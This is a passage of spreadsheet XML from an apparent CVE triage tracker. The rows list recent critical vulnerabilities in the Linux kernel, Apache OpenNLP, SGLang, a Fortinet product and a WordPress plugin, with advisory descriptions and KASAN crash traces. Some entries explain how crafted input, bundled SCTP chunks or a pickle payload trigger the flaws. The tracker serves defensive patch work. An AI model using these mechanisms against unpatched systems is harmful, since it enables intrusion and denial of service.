        <is>
          <t>CRITICAL</t>
        </is>
      </c>
      <c r="F46" s="5" t="inlineStr">
        <is>
          <t>416baaa9-dc9f-4396-8d5f-8c081fb06d67</t>
        </is>
      </c>
      <c r="G46" s="5" t="inlineStr"/>
      <c r="H46" s="5" t="n">
        <v>0.006</v>
      </c>
      <c r="I46" s="5" t="inlineStr"/>
      <c r="J46" s="5" t="inlineStr"/>
      <c r="K46" s="5" t="inlineStr"/>
      <c r="L46" s="5" t="inlineStr"/>
      <c r="M46" s="5" t="inlineStr"/>
      <c r="N46" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O46" s="5" t="inlineStr">
        <is>
          <t>2026-09-11</t>
        </is>
      </c>
      <c r="P46" s="5" t="inlineStr"/>
      <c r="Q46" s="5" t="inlineStr"/>
      <c r="R46" s="5" t="inlineStr">
        <is>
          <t>In the Linux kernel, the following vulnerability has been resolved:
net/smc: bound the peer rkey counts in SMC-Rv2 LLC messages
On a link whose device has max_recv_sge == 1 there is no shared v2 receive
buffer, and smc_llc_save_add_link_rkeys() takes the v2 extension from 44
bytes past the start of the queue entry's inline message:
  ext = (struct smc_llc_msg_add_link_v2_ext *)(llc_msg + SMC_WR_TX_SIZE);
The entry is a 72-byte allocation and the extension starts at offset 68, so
ext-&gt;num_rkeys at offset 94 is already past it. This happens on every
SMC-Rv2 link addition, whatever the peer sends:
  [    2.490065] BUG: KASAN: slab-out-of-bounds in smc_llc_save_add_link_rkeys+0x333/0x350
  [    2.490431] Read of size 2 at addr ffff8880056406de by task smctest/106
  [    2.490709]
  [    2.490792] CPU: 0 UID: 0 PID: 106 Comm: smctest Not tainted 7.2.0-rc5-p1-g77a5d9d9c99f #32 PREEMPT(lazy)
  [    2.490795] Hardware name: QEMU Ubuntu 24.04 PC v2 (i440FX + PIIX, arch_caps fix, 1996), BIOS 1.16.3-debian-1.16.3-2 04/01/2014
  [    2.490798] Call Trace:
  [    2.490803]  &lt;TASK&gt;
  [    2.490805]  dump_stack_lvl+0x53/0x70
  [    2.490810]  print_report+0xd0/0x630
  [    2.490828]  ? __pfx__raw_spin_lock_irqsave+0x10/0x10
  [    2.490832]  ? smc_llc_save_add_link_rkeys+0x333/0x350
  [    2.490834]  kasan_report+0xce/0x100
  [    2.490836]  ? smc_llc_save_add_link_rkeys+0x333/0x350
  [    2.490837]  smc_llc_save_add_link_rkeys+0x333/0x350
  [    2.490839]  ? smcr_buf_map_lgr+0x1bf/0x2b0
  [    2.490844]  smc_llc_cli_add_link+0xca7/0x1e80
  [    2.490848]  ? smc_llc_wait+0x355/0x810
  [    2.490850]  ? __pfx_smc_llc_wait+0x10/0x10
  [    2.490851]  ? __pfx_smc_llc_cli_add_link+0x10/0x10
  [    2.490853]  ? __pfx_autoremove_wake_function+0x10/0x10
  [    2.490863]  __smc_connect+0x3f5c/0x4980
  [    2.490873]  ? __pfx_kernel_connect+0x10/0x10
  [    2.490888]  ? __pfx___smc_connect+0x10/0x10
  [    2.490891]  ? release_sock+0x148/0x1d0
  [    2.490894]  smc_connect+0x42c/0x580
  [    2.490896]  __sys_connect+0xfc/0x130
  [    2.490898]  ? __pfx___sys_connect+0x10/0x10
  [    2.490900]  ? handle_mm_fault+0x1a1/0x430
  [    2.490908]  __x64_sys_connect+0x6d/0xb0
  [    2.490909]  ? fpregs_assert_state_consistent+0x56/0xe0
  [    2.490917]  do_syscall_64+0xf9/0x540
  [    2.490921]  entry_SYSCALL_64_after_hwframe+0x77/0x7f
  [    2.490924] RIP: 0033:0x421bb4
  [    2.490927] Code: ff f7 d8 64 89 01 48 83 c8 ff c3 66 2e 0f 1f 84 00 00 00 00 00 90 f3 0f 1e fa 80 3d ad 34 09 00 00 74 13 b8 2a 00 00 00 0f 05 &lt;48&gt; 3d 00 f0 ff ff 77 4c c3 0f 1f 00 55 48 89 e5 48 83 ec 10 89 55
  [    2.490929] RSP: 002b:00007ffd473b01a8 EFLAGS: 00000202 ORIG_RAX: 000000000000002a
  [    2.490935] RAX: ffffffffffffffda RBX: 0000000000000000 RCX: 0000000000421bb4
  [    2.490936] RDX: 0000000000000010 RSI: 00007ffd473b01d0 RDI: 0000000000000003
  [    2.490937] RBP: 0000000000003930 R08: 0000000000000004 R09: 0000000000000000
  [    2.490938] R10: 00007ffd473b0f98 R11: 0000000000000202 R12: 0000000000000006
  [    2.490939] R13: 00007ffd473b0f87 R14: 0000000000000003 R15: 00007ffd473b0f90
  [    2.490940]  &lt;/TASK&gt;
  [    2.490941]
  [    2.499545] Allocated by task 44:
  [    2.499693]  kasan_save_stack+0x33/0x60
  [    2.499860]  kasan_save_track+0x14/0x30
  [    2.500026]  __kasan_kmalloc+0x8f/0xa0
  [    2.500190]  __kmalloc_cache_noprof+0x158/0x370
  [    2.500393]  smc_llc_enqueue+0x72/0x560
  [    2.500559]  smc_wr_rx_tasklet_fn+0x474/0xa80
  [    2.500747]  tasklet_action_common+0x20f/0x8a0
  [    2.500945]  handle_softirqs+0x18e/0x590
  [    2.501115]  do_softirq+0x3b/0x60
  [    2.501266]  __local_bh_enable_ip+0x61/0x70
  [    2.501446]  __alloc_skb+0x732/0x890
  [    2.501604]  rxe_init_packet+0x16b/0x4f0
  [    2.501783]  prepare_ack_packet+0xb8/0x830
  [    2.501962]  rxe_receiver+0x495/0x96e0
  [    2.502125]  do_work+0x144/0x470
  [    2.502269]  process_one_work+0x633/0x1030
  [    2.502450]  worker_thread+0x45b/0xd10
  [    2.50261
---truncated---</t>
        </is>
      </c>
      <c r="S46" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-80986</t>
        </is>
      </c>
    </row>
    <row r="47">
      <c r="A47" s="5" t="inlineStr">
        <is>
          <t>P2 - High</t>
        </is>
      </c>
      <c r="B47" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C47" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-81002</t>
        </is>
      </c>
      <c r="D47" s="5" t="n">
        <v>9.800000000000001</v>
      </c>
      <c r="E47" s="5" t="inlineStr">
        <is>
          <t>CRITICAL</t>
        </is>
      </c>
      <c r="F47" s="5" t="inlineStr">
        <is>
          <t>416baaa9-dc9f-4396-8d5f-8c081fb06d67</t>
        </is>
      </c>
      <c r="G47" s="5" t="inlineStr"/>
      <c r="H47" s="5" t="n">
        <v>0.005</v>
      </c>
      <c r="I47" s="5" t="inlineStr"/>
      <c r="J47" s="5" t="inlineStr"/>
      <c r="K47" s="5" t="inlineStr"/>
      <c r="L47" s="5" t="inlineStr"/>
      <c r="M47" s="5" t="inlineStr"/>
      <c r="N47" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O47" s="5" t="inlineStr">
        <is>
          <t>2026-09-11</t>
        </is>
      </c>
      <c r="P47" s="5" t="inlineStr"/>
      <c r="Q47" s="5" t="inlineStr"/>
      <c r="R47" s="5" t="inlineStr">
        <is>
          <t>In the Linux kernel, the following vulnerability has been resolved:
xdp: fix zero-copy frame layout
xdp_convert_zc_to_xdp_frame() clones an XSK packet into an order-0 page
and advertises PAGE_SIZE as its frame size.  It allows the copied frame
to occupy the page tail needed by skb_shared_info and records zero
headroom even when metadata separates the frame header from packet data.
An AF_XDP zero-copy packet redirected through cpumap can therefore make
the skb overlap skb_shared_info or place it beyond the allocated page.
Limit the copied layout to SKB_WITH_OVERHEAD(PAGE_SIZE) and include the
metadata length in frame headroom.  Redirect callers already handle a
NULL conversion result.
BUG: KASAN: slab-out-of-bounds in skb_gro_receive
Write of size 4 at addr ffff88800cf37004 by task cpumap/1/map:1/146
Call Trace:
 skb_gro_receive (net/core/gro.c:174)
 udp_gro_receive (net/ipv4/udp_offload.c:812)
 inet_gro_receive (net/ipv4/af_inet.c:1539)
 dev_gro_receive (net/core/gro.c:515)
 gro_receive_skb (net/core/gro.c:633)
 cpu_map_kthread_run (kernel/bpf/cpumap.c:395)
 kthread (kernel/kthread.c:436)
 ret_from_fork (arch/x86/kernel/process.c:164)
 ret_from_fork_asm (arch/x86/entry/entry_64.S:255)
Kernel panic - not syncing: KASAN: panic_on_warn set ...</t>
        </is>
      </c>
      <c r="S47" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-81002</t>
        </is>
      </c>
    </row>
    <row r="48">
      <c r="A48" s="5" t="inlineStr">
        <is>
          <t>P2 - High</t>
        </is>
      </c>
      <c r="B48" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C48" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-82617</t>
        </is>
      </c>
      <c r="D48" s="5" t="n">
        <v>9.800000000000001</v>
      </c>
      <c r="E48" s="5" t="inlineStr">
        <is>
          <t>CRITICAL</t>
        </is>
      </c>
      <c r="F48" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="G48" s="5" t="inlineStr"/>
      <c r="H48" s="5" t="n">
        <v>0.003</v>
      </c>
      <c r="I48" s="5" t="inlineStr"/>
      <c r="J48" s="5" t="inlineStr"/>
      <c r="K48" s="5" t="inlineStr">
        <is>
          <t>apache:opennlp</t>
        </is>
      </c>
      <c r="L48" s="5" t="inlineStr"/>
      <c r="M48" s="5" t="inlineStr"/>
      <c r="N48" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O48" s="5" t="inlineStr">
        <is>
          <t>2026-09-11</t>
        </is>
      </c>
      <c r="P48" s="5" t="inlineStr"/>
      <c r="Q48" s="5" t="inlineStr">
        <is>
          <t>CWE-1333</t>
        </is>
      </c>
      <c r="R48" s="5" t="inlineStr">
        <is>
          <t>The two built-in name-finder patterns exposed by
opennlp.tools.namefind.RegexNameFinderFactory - DEFAULT_REGEX_NAME_FINDER.EMAIL
and DEFAULT_REGEX_NAME_FINDER.URL - contain ambiguous nested quantifiers. An
application that obtains these finders through
RegexNameFinderFactory.getDefaultRegexNameFinders(...) and then applies them to
untrusted text through RegexNameFinder.find(String[]) or RegexNameFinder.find(String)
can be driven into super-linear backtracking or into unbounded matcher recursion by a
small crafted input.
For the EMAIL pattern, a long run of local-part characters that is never followed by an
@ forces the matcher to re-scan to end-of-input from every starting offset. Cost grows
quadratically with input length: an input of approximately 32 KB consumes several seconds
of CPU in a single find() call and returns no match, and each doubling of the input
multiplies the cost roughly four-fold.
For the URL pattern, the query-string sub-expression nests a capturing repetition inside
an outer repetition. The JDK matcher recurses once per query token, so an input of
approximately 4 KB containing many &amp;-separated tokens exhausts the thread stack and
causes java.lang.StackOverflowError to propagate out of find(), terminating the
calling thread. On a thread created with a smaller stack (for example -Xss512k, typical
of server worker pools) approximately 1 KB is sufficient.
In both cases an attacker who can supply text for analysis can convert a single request
into seconds to minutes of pinned CPU, or into an abrupt thread death, denying service to
the embedding application. No authentication, special configuration, or model file is
required beyond the application having selected one of the two built-in finders.
This issue affects Apache OpenNLP: from 2.0.0 through 2.5.11; from 3.0.0-M1 through
3.0.0-M5.
Users are recommended to upgrade to version 2.5.12, or to 3.0.0-M6 for users tracking the
3.0.0 milestone line, which fix the issue.</t>
        </is>
      </c>
      <c r="S48" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-82617</t>
        </is>
      </c>
    </row>
    <row r="49">
      <c r="A49" s="5" t="inlineStr">
        <is>
          <t>P2 - High</t>
        </is>
      </c>
      <c r="B49" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C49" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-84390</t>
        </is>
      </c>
      <c r="D49" s="5" t="n">
        <v>9.800000000000001</v>
      </c>
      <c r="E49" s="5" t="inlineStr">
        <is>
          <t>CRITICAL</t>
        </is>
      </c>
      <c r="F49" s="5" t="inlineStr">
        <is>
          <t>psirt@fortinet.com</t>
        </is>
      </c>
      <c r="G49" s="5" t="inlineStr"/>
      <c r="H49" s="5" t="n">
        <v>0.005</v>
      </c>
      <c r="I49" s="5" t="inlineStr"/>
      <c r="J49" s="5" t="inlineStr">
        <is>
          <t>fortinet</t>
        </is>
      </c>
      <c r="K49" s="5" t="inlineStr"/>
      <c r="L49" s="5" t="inlineStr"/>
      <c r="M49" s="5" t="inlineStr"/>
      <c r="N49" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O49" s="5" t="inlineStr">
        <is>
          <t>2026-09-11</t>
        </is>
      </c>
      <c r="P49" s="5" t="inlineStr"/>
      <c r="Q49" s="5" t="inlineStr">
        <is>
          <t>CWE-540</t>
        </is>
      </c>
      <c r="R49" s="5" t="inlineStr">
        <is>
          <t>A inclusion of sensitive information in source code vulnerability in Fortinet FortiMonitorOnSight 7.2.4 through 7.2.7, FortiMonitorOnSight 7.2.0 through 7.2.2 may allow attacker to improper access control via &lt;insert attack vector here&gt;</t>
        </is>
      </c>
      <c r="S49" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-84390</t>
        </is>
      </c>
    </row>
    <row r="50">
      <c r="A50" s="5" t="inlineStr">
        <is>
          <t>P2 - High</t>
        </is>
      </c>
      <c r="B50" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C50" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-86793</t>
        </is>
      </c>
      <c r="D50" s="5" t="n">
        <v>9.800000000000001</v>
      </c>
      <c r="E50" s="5" t="inlineStr">
        <is>
          <t>CRITICAL</t>
        </is>
      </c>
      <c r="F50" s="5" t="inlineStr">
        <is>
          <t>134c704f-9b21-4f2e-91b3-4a467353bcc0</t>
        </is>
      </c>
      <c r="G50" s="5" t="inlineStr"/>
      <c r="H50" s="5" t="n">
        <v>0.004</v>
      </c>
      <c r="I50" s="5" t="inlineStr"/>
      <c r="J50" s="5" t="inlineStr"/>
      <c r="K50" s="5" t="inlineStr"/>
      <c r="L50" s="5" t="inlineStr"/>
      <c r="M50" s="5" t="inlineStr"/>
      <c r="N50" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O50" s="5" t="inlineStr">
        <is>
          <t>2026-09-11</t>
        </is>
      </c>
      <c r="P50" s="5" t="inlineStr"/>
      <c r="Q50" s="5" t="inlineStr">
        <is>
          <t>CWE-94</t>
        </is>
      </c>
      <c r="R50" s="5" t="inlineStr">
        <is>
          <t>SGLang allows unauthenticated pickle deserialization through /update_weights_from_tensor when no auth keys are configured, and the SafeUnpickler policy can be bypassed because builtins.import and builtins.getattr are resolvable, enabling code execution via pickle REDUCE.</t>
        </is>
      </c>
      <c r="S50" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-86793</t>
        </is>
      </c>
    </row>
    <row r="51">
      <c r="A51" s="5" t="inlineStr">
        <is>
          <t>P2 - High</t>
        </is>
      </c>
      <c r="B51" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C51" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-8778</t>
        </is>
      </c>
      <c r="D51" s="5" t="n">
        <v>9.800000000000001</v>
      </c>
      <c r="E51" s="5" t="inlineStr">
        <is>
          <t>CRITICAL</t>
        </is>
      </c>
      <c r="F51" s="5" t="inlineStr">
        <is>
          <t>security@wordfence.com</t>
        </is>
      </c>
      <c r="G51" s="5" t="inlineStr"/>
      <c r="H51" s="5" t="n">
        <v>0.006</v>
      </c>
      <c r="I51" s="5" t="inlineStr"/>
      <c r="J51" s="5" t="inlineStr"/>
      <c r="K51" s="5" t="inlineStr"/>
      <c r="L51" s="5" t="inlineStr"/>
      <c r="M51" s="5" t="inlineStr"/>
      <c r="N51" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O51" s="5" t="inlineStr">
        <is>
          <t>2026-09-11</t>
        </is>
      </c>
      <c r="P51" s="5" t="inlineStr"/>
      <c r="Q51" s="5" t="inlineStr">
        <is>
          <t>CWE-434</t>
        </is>
      </c>
      <c r="R51" s="5" t="inlineStr">
        <is>
          <t>The MIPL Grouped Checkout Fields for WooCommerce – Customize &amp; Organize Checkout Fields. plugin for WordPress is vulnerable to arbitrary file uploads due to missing file type validation in the `mipl_wc_upload_file` function in all versions up to, and including, 1.2.1. This makes it possible for unauthenticated attackers to upload arbitrary files on the affected site's server which may make remote code execution possible.</t>
        </is>
      </c>
      <c r="S51" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-8778</t>
        </is>
      </c>
    </row>
    <row r="52">
      <c r="A52" s="5" t="inlineStr">
        <is>
          <t>P2 - High</t>
        </is>
      </c>
      <c r="B52" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C52" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-89478</t>
        </is>
      </c>
      <c r="D52" s="5" t="n">
        <v>9.800000000000001</v>
      </c>
      <c r="E52" s="5" t="inlineStr">
        <is>
          <t>CRITICAL</t>
        </is>
      </c>
      <c r="F52" s="5" t="inlineStr">
        <is>
          <t>416baaa9-dc9f-4396-8d5f-8c081fb06d67</t>
        </is>
      </c>
      <c r="G52" s="5" t="inlineStr"/>
      <c r="H52" s="5" t="n">
        <v>0.005</v>
      </c>
      <c r="I52" s="5" t="inlineStr"/>
      <c r="J52" s="5" t="inlineStr"/>
      <c r="K52" s="5" t="inlineStr"/>
      <c r="L52" s="5" t="inlineStr"/>
      <c r="M52" s="5" t="inlineStr"/>
      <c r="N52" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O52" s="5" t="inlineStr">
        <is>
          <t>2026-09-11</t>
        </is>
      </c>
      <c r="P52" s="5" t="inlineStr"/>
      <c r="Q52" s="5" t="inlineStr"/>
      <c r="R52" s="5" t="inlineStr">
        <is>
          <t>In the Linux kernel, the following vulnerability has been resolved:
sctp: drop a chunk if its transport was removed
sctp_rcv() resolves the transport once per packet and leaves it in
chunk-&gt;transport. The lookup reference, or the one sctp_add_backlog() takes
if the socket is owned by userspace, keeps it around until the chunk has
been processed.
An authenticated ASCONF DEL-IP can remove it in the meantime.
sctp_assoc_rm_peer() takes the transport out of the association and calls
sctp_transport_free(), which tags it dead and drops the reference the
association held. There is a window on both paths: the packet can sit on
the socket backlog, and on the direct path the lookup completes before
bh_lock_sock().
The DATA chunk in that packet puts the removed transport back into
asoc-&gt;peer.last_data_from. Once the packet is done that reference goes
away and the transport is freed by RCU, so the next delayed SACK carries
the pointer into the SACK chunk and sctp_outq_select_transport() reads the
freed transport's state.
Drop the chunk in sctp_inq_push(), next to the existing rcvr-&gt;dead check.
Both paths reach it with the association's socket lock held. The peer
retransmits it.</t>
        </is>
      </c>
      <c r="S52" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-89478</t>
        </is>
      </c>
    </row>
    <row r="53">
      <c r="A53" s="5" t="inlineStr">
        <is>
          <t>P2 - High</t>
        </is>
      </c>
      <c r="B53" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C53" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-89479</t>
        </is>
      </c>
      <c r="D53" s="5" t="n">
        <v>9.800000000000001</v>
      </c>
      <c r="E53" s="5" t="inlineStr">
        <is>
          <t>CRITICAL</t>
        </is>
      </c>
      <c r="F53" s="5" t="inlineStr">
        <is>
          <t>416baaa9-dc9f-4396-8d5f-8c081fb06d67</t>
        </is>
      </c>
      <c r="G53" s="5" t="inlineStr"/>
      <c r="H53" s="5" t="n">
        <v>0.005</v>
      </c>
      <c r="I53" s="5" t="inlineStr"/>
      <c r="J53" s="5" t="inlineStr"/>
      <c r="K53" s="5" t="inlineStr"/>
      <c r="L53" s="5" t="inlineStr"/>
      <c r="M53" s="5" t="inlineStr"/>
      <c r="N53" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O53" s="5" t="inlineStr">
        <is>
          <t>2026-09-11</t>
        </is>
      </c>
      <c r="P53" s="5" t="inlineStr"/>
      <c r="Q53" s="5" t="inlineStr"/>
      <c r="R53" s="5" t="inlineStr">
        <is>
          <t>In the Linux kernel, the following vulnerability has been resolved:
sctp: stop processing a packet once its association is deleted
sctp_endpoint_bh_rcv() looks the association up only when chunk-&gt;asoc is
NULL, and caches the result in chunk-&gt;asoc and chunk-&gt;transport without
taking a reference.
A packet that matches no association is handed to the endpoint, so a peer
can bundle COOKIE ECHO, SHUTDOWN and SHUTDOWN ACK in one packet. The
COOKIE ECHO creates the association, the SHUTDOWN chunk caches it, and
with the outqueue empty the SHUTDOWN ACK reaches sctp_sf_do_9_2_final(),
so the association and its transports are freed.
The endpoint loop has no counterpart to the asoc-&gt;base.dead check in
sctp_assoc_bh_rcv(). The next chunk writes to last_time_heard in the freed
transport and is then passed to sctp_do_sm() with the freed association.
The transport is freed through RCU, so this needs the packet to come off
the socket backlog, where the loop runs in task context.
The endpoint loop cannot do the same check: it holds no reference on the
association, so reading asoc-&gt;base.dead would itself be a use-after-free.
Mark the packet for discard in the command interpreter, just before it
deletes the association. That is also before sctp_inq_free() releases the
chunk on the association receive path.
sctp_sf_do_5_2_4_dupcook() issues SCTP_CMD_DELETE_TCB for the temporary
association, while the one the packet belongs to stays alive. A restarting
peer can bundle DATA behind its COOKIE ECHO, so compare against
chunk-&gt;asoc and leave that case alone.</t>
        </is>
      </c>
      <c r="S53" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-89479</t>
        </is>
      </c>
    </row>
    <row r="54">
      <c r="A54" s="5" t="inlineStr">
        <is>
          <t>P2 - High</t>
        </is>
      </c>
      <c r="B54" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C54" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-89482</t>
        </is>
      </c>
      <c r="D54" s="5" t="n">
        <v>9.800000000000001</v>
      </c>
      <c r="E54" s="5" t="inlineStr">
        <is>
          <t>CRITICAL</t>
        </is>
      </c>
      <c r="F54" s="5" t="inlineStr">
        <is>
          <t>416baaa9-dc9f-4396-8d5f-8c081fb06d67</t>
        </is>
      </c>
      <c r="G54" s="5" t="inlineStr"/>
      <c r="H54" s="5" t="n">
        <v>0.007</v>
      </c>
      <c r="I54" s="5" t="inlineStr"/>
      <c r="J54" s="5" t="inlineStr"/>
      <c r="K54" s="5" t="inlineStr"/>
      <c r="L54" s="5" t="inlineStr"/>
      <c r="M54" s="5" t="inlineStr"/>
      <c r="N54" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O54" s="5" t="inlineStr">
        <is>
          <t>2026-09-11</t>
        </is>
      </c>
      <c r="P54" s="5" t="inlineStr"/>
      <c r="Q54" s="5" t="inlineStr"/>
      <c r="R54" s="5" t="inlineStr">
        <is>
          <t>In the Linux kernel, the following vulnerability has been resolved:
nvme-tcp: do not accept C2HData based on blk_rq_payload_bytes() alone
Commit 25e5cb780e62 ("nvme-tcp: fix possible crash in write_zeroes
processing") established that blk_rq_payload_bytes() must not be read
without first checking blk_rq_nr_phys_segments(), and recorded the
result in nvme_tcp_setup_cmd_pdu() as req-&gt;data_len. The receive side
was left as it was.
The two differ for REQ_OP_WRITE_ZEROES, which has no physical segments
but a non-zero blk_rq_bytes(), so setup leaves req-&gt;iter untouched
while the receive gate lets a C2HData through and nvme_tcp_recv_data()
copies into whatever the previous command on that tag left there. The
driver-private area is zeroed only when the tag set is allocated.
Reproduced with a test target that leaves a residual iterator on a tag
and then sends a C2HData for a WRITE_ZEROES command on the same tag:
BUG: KASAN: wild-memory-access in _copy_to_iter+0x642/0x1330
Write of size 512 at addr ffe728c2175dfa81 by task kworker/0:1H/103
CPU: 0 UID: 0 PID: 103 Comm: kworker/0:1H Not tainted 7.2.0-rc5-NVMETCP-gf5098b6bae76 #1 PREEMPT(lazy)
Hardware name: QEMU Ubuntu 24.04 PC v2 (i440FX + PIIX, arch_caps fix, 1996), BIOS 1.16.3-debian-1.16.3-2 04/01/2014
Workqueue: nvme_tcp_wq nvme_tcp_io_work
Call Trace:
 &lt;TASK&gt;
 dump_stack_lvl+0x53/0x70
 kasan_report+0xce/0x100
 ? _copy_to_iter+0x642/0x1330
 kasan_check_range+0x105/0x1b0
 __asan_memcpy+0x3c/0x60
 _copy_to_iter+0x642/0x1330
 ? __pfx_sock_has_perm+0x10/0x10
 ? worker_thread+0x45b/0xd10
 ? __pfx__copy_to_iter+0x10/0x10
 ? _raw_spin_lock_bh+0x83/0xe0
 ? __pfx__raw_spin_lock_bh+0x10/0x10
 __skb_datagram_iter+0xf3/0x820
 ? __pfx_simple_copy_to_iter+0x10/0x10
 ? __asan_memcpy+0x3c/0x60
 ? skb_copy_bits+0x58d/0x830
 skb_copy_datagram_iter+0x37/0x120
 nvme_tcp_recv_skb+0xa07/0x4320
 ? __pfx_nvme_tcp_recv_skb+0x10/0x10
 __tcp_read_sock+0x1ab/0x810
 ? __pfx_nvme_tcp_recv_skb+0x10/0x10
 ? __pfx_lock_sock_nested+0x10/0x10
 ? __pfx___tcp_read_sock+0x10/0x10
 nvme_tcp_try_recv+0x152/0x1e0
 ? __pfx_nvme_tcp_try_recv+0x10/0x10
 ? __pfx_mutex_unlock+0x10/0x10
 nvme_tcp_io_work+0x1e4/0x6c0
 ? __schedule+0x181a/0x49f0
 ? __pfx_nvme_tcp_io_work+0x10/0x10
 process_one_work+0x633/0x1030
Keep the blk_rq_payload_bytes() test and add req-&gt;data_len to it. The
old test is what rejects a C2HData naming a tag that is no longer in
flight, because blk_update_request() zeroes rq-&gt;__data_len on
completion; req-&gt;data_len and req-&gt;curr_bio are driver-private and
survive completion, so they cannot stand in for it. Setup initialises
the iterator only when both req-&gt;curr_bio and req-&gt;data_len are set, so
the gate now tests the same two.</t>
        </is>
      </c>
      <c r="S54" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-89482</t>
        </is>
      </c>
    </row>
    <row r="55">
      <c r="A55" s="5" t="inlineStr">
        <is>
          <t>P2 - High</t>
        </is>
      </c>
      <c r="B55" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C55" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-89485</t>
        </is>
      </c>
      <c r="D55" s="5" t="n">
        <v>9.800000000000001</v>
      </c>
      <c r="E55" s="5" t="inlineStr">
        <is>
          <t>CRITICAL</t>
        </is>
      </c>
      <c r="F55" s="5" t="inlineStr">
        <is>
          <t>416baaa9-dc9f-4396-8d5f-8c081fb06d67</t>
        </is>
      </c>
      <c r="G55" s="5" t="inlineStr"/>
      <c r="H55" s="5" t="n">
        <v>0.007</v>
      </c>
      <c r="I55" s="5" t="inlineStr"/>
      <c r="J55" s="5" t="inlineStr"/>
      <c r="K55" s="5" t="inlineStr"/>
      <c r="L55" s="5" t="inlineStr"/>
      <c r="M55" s="5" t="inlineStr"/>
      <c r="N55" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O55" s="5" t="inlineStr">
        <is>
          <t>2026-09-11</t>
        </is>
      </c>
      <c r="P55" s="5" t="inlineStr"/>
      <c r="Q55" s="5" t="inlineStr"/>
      <c r="R55" s="5" t="inlineStr">
        <is>
          <t>In the Linux kernel, the following vulnerability has been resolved:
lockd: pin next file across nlm_inspect_file lock-drop
nlm_traverse_files() pins the current file with f_count++ across
a mutex_unlock for nlm_inspect_file(), but nothing pins the saved
next pointer.  A concurrent nlm_release_file() can kfree the next
file during the unlock window, and the iterator dereferences freed
memory on the next loop step.
Pin both current and next before the lock-drop.  Advance by
swapping the pinned cursors at the end of each iteration so next
is always held alive across the unlock.
Always call nlm_file_release() after dropping the iteration pin,
regardless of whether the file matched the predicate.  Use
nlm_file_inuse(), which does a live walk of the inode lock list,
rather than the cached f_locks field, so skipped files that never
ran nlm_inspect_file() are evaluated correctly.
Because every file in a hash bucket is now pinned and released,
files skipped by the is_failover_file predicate that have no
locks, blocks, shares, or external references are deleted during
traversal.  The old code never evaluated skipped files for
cleanup.  The new behavior is intentional: such files are stale
and should not persist in the table.</t>
        </is>
      </c>
      <c r="S55" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-89485</t>
        </is>
      </c>
    </row>
    <row r="56">
      <c r="A56" s="5" t="inlineStr">
        <is>
          <t>P2 - High</t>
        </is>
      </c>
      <c r="B56" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C56" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-89492</t>
        </is>
      </c>
      <c r="D56" s="5" t="n">
        <v>9.800000000000001</v>
      </c>
      <c r="E56" s="5" t="inlineStr">
        <is>
          <t>CRITICAL</t>
        </is>
      </c>
      <c r="F56" s="5" t="inlineStr">
        <is>
          <t>416baaa9-dc9f-4396-8d5f-8c081fb06d67</t>
        </is>
      </c>
      <c r="G56" s="5" t="inlineStr"/>
      <c r="H56" s="5" t="n">
        <v>0.006</v>
      </c>
      <c r="I56" s="5" t="inlineStr"/>
      <c r="J56" s="5" t="inlineStr"/>
      <c r="K56" s="5" t="inlineStr"/>
      <c r="L56" s="5" t="inlineStr"/>
      <c r="M56" s="5" t="inlineStr"/>
      <c r="N56" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O56" s="5" t="inlineStr">
        <is>
          <t>2026-09-11</t>
        </is>
      </c>
      <c r="P56" s="5" t="inlineStr"/>
      <c r="Q56" s="5" t="inlineStr"/>
